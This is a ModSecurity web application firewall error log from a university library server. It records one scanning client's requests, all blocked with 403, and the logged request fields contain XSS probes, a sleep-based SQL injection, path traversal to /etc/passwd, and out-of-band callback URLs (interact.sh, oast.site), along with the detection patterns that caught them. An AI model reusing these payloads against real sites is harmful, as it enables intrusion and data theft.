[Tue Aug 29 11:52:01.570859 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAni@9kAAAAU"]
[Tue Aug 29 11:52:02.655517 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAnkwdwAAAAY"]
[Tue Aug 29 11:52:02.712054 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAlIBi4AAAAn"]
[Tue Aug 29 11:52:02.762766 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAm7nFEAAAAE"]
[Tue Aug 29 11:52:02.779296 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAnkwd4AAAAY"]
[Tue Aug 29 11:52:04.898583 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAhoHTgAAAAl"]
[Tue Aug 29 11:52:04.954780 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb05on75gpobssdg.oast.site/ found within TX:1: cjmnijtjmimvgniikdb05on75gpobssdg.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dMCo-f0AAAn0GaMAAAAa"]
[Tue Aug 29 11:52:05.654929 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dcCo-f0AAAm@52sAAAAH"]
[Tue Aug 29 11:52:06.624083 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfh.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAlIBjkAAAAn"]
[Tue Aug 29 11:52:06.632275 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:to: /92874';alert(document.domain)//280"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAjdQaEAAAAZ"]
[Tue Aug 29 11:52:08.536903 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAlUlpQAAAA0"]
[Tue Aug 29 11:52:08.652901 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAn0GbAAAAAa"]
[Tue Aug 29 11:52:09.608230 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAm7nF8AAAAE"]
[Tue Aug 29 11:52:09.667201 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAni@@sAAAAU"]
[Tue Aug 29 11:52:10.602814 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAni@@4AAAAU"]
[Tue Aug 29 11:52:11.608022 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAnTlMUAAAAA"]
[Tue Aug 29 11:52:11.714326 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAnIloUAAAAV"]
[Tue Aug 29 11:52:12.621582 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAn0GcEAAAAa"]
[Tue Aug 29 11:52:13.561168 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAnIlowAAAAV"]
[Tue Aug 29 11:52:13.736231 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAnTlNAAAAAA"]
[Tue Aug 29 11:52:14.548563 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAlUlqcAAAA0"]
[Tue Aug 29 11:52:14.685365 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAnjjM0AAAAX"]
[Tue Aug 29 11:52:14.758928 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAlUlqsAAAA0"]
[Tue Aug 29 11:52:15.570704 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAnn2B0AAAAe"]
[Tue Aug 29 11:52:15.605581 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/download"] [unique_id "ZO15f8Co-f0AAAfWOMoAAAAL"]
[Tue Aug 29 11:52:16.636397 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAlUlrEAAAA0"]
[Tue Aug 29 11:52:16.675588 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gMCo-f0AAAnn2CEAAAAe"]
[Tue Aug 29 11:52:17.860565 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gcCo-f0AAAn95-4AAAAD"]
[Tue Aug 29 11:52:17.879447 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAoEZMYAAAAB"]
[Tue Aug 29 11:52:17.910389 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAnHQisAAAAT"]
[Tue Aug 29 11:52:18.626299 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15gsCo-f0AAAlIBlsAAAAn"]
[Tue Aug 29 11:52:19.660059 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id 